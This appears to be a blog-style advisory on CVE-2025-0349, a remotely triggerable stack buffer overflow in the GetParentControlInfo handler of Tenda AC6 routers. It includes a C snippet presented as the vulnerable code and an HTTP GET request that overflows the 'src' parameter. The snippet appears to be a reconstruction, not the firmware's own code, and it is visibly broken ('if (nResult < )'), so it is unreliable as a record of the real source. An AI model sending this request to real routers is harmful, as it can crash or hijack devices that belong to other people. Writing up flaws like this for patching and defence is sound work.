A critical vulnerability, classified as CVE-2025-0349, has been discovered in Tenda AC6 15.03.05.16 routers. The affected function is GetParentControlInfo in the /goform/GetParentControlInfo file. The exploitation of this vulnerability may lead to stack-based buffer overflow, and can be launched remotely. Attackers may use the publicly disclosed exploit, and other parameters might be impacted as well. In this post, we will analyze the vulnerability, take a look at the code snippet, and discuss exploit details.
Vulnerability Analysis
The GetParentControlInfo function is part of the Tenda AC6 router's web interface code. When properly manipulated, this vulnerability can lead to unauthorized access to sensitive information on the router and even enable an attacker to execute remote code, potentially seizing control of the device.
An attacker can exploit this vulnerability by sending a specially crafted HTTP GET request to the targeted Tenda router. The function, GetParentControlInfo, can be found within the /goform/GetParentControlInfo file.
The critical element of this vulnerability is the manipulation of the 'src' argument during the processing of the HTTP GET request. By carefully crafting specific input values, the attacker can trigger a stack-based buffer overflow, which may lead to unauthorized access or execution of malicious code.
Here is a code snippet that demonstrates the vulnerability in the GetParentControlInfo function
int GetParentControlInfo(){
char src[64];
int nResult;
strcpy(src, getValue("src")); // Copy "src" argument value from HTTP request into "src"
nResult = checkBuffer(src); // Check the copied "src"
if (nResult < ){
return nResult;
}
// ...rest of the code omitted for brevity
}
In the code snippet above, the function GetParentControlInfo starts by defining a src buffer with a fixed size of 64 bytes. The function then copies the src argument value from the HTTP request using strcpy(). This is where the vulnerability lies - since strcpy() does not limit the size of the copied data, an attacker can supply a longer input as the src argument, causing a buffer overflow to occur.
Exploit Details
As mentioned earlier, the exploit involves sending a specially crafted HTTP GET request to the target router. The attacker can manipulate the 'src' argument in the request to trigger a stack-based buffer overflow. Here is an example of an HTTP request that can exploit the vulnerability:
GET /goform/GetParentControlInfo?src=AAA....AAA (Above 64 characters total length) HTTP/1.1
Host: <target-router-ip>
User-Agent: Exploit-CVE-2025-0349
Links to Original References
- CVE-2025-0349 Official Listing
- Advisory on Tenda Vendor Website
Conclusion
CVE-2025-0349 represents a critical vulnerability within the Tenda AC6 router firmware, specifically affecting the GetParentControlInfo function in the /goform/GetParentControlInfo file. This vulnerability poses a significant risk to users, as unauthorized access, sensitive information disclosure, and even control over the device may be obtained remotely. Router owners should apply firmware updates as soon as they become available from the vendor, and keep track of new developments concerning this vulnerability.
Disclaimer: The information contained in this post is for educational and informational purposes only and does not advocate unauthorized access to or exploitation of any network devices.
Timeline
Published on: 01/09/2025 11:15:16 UTC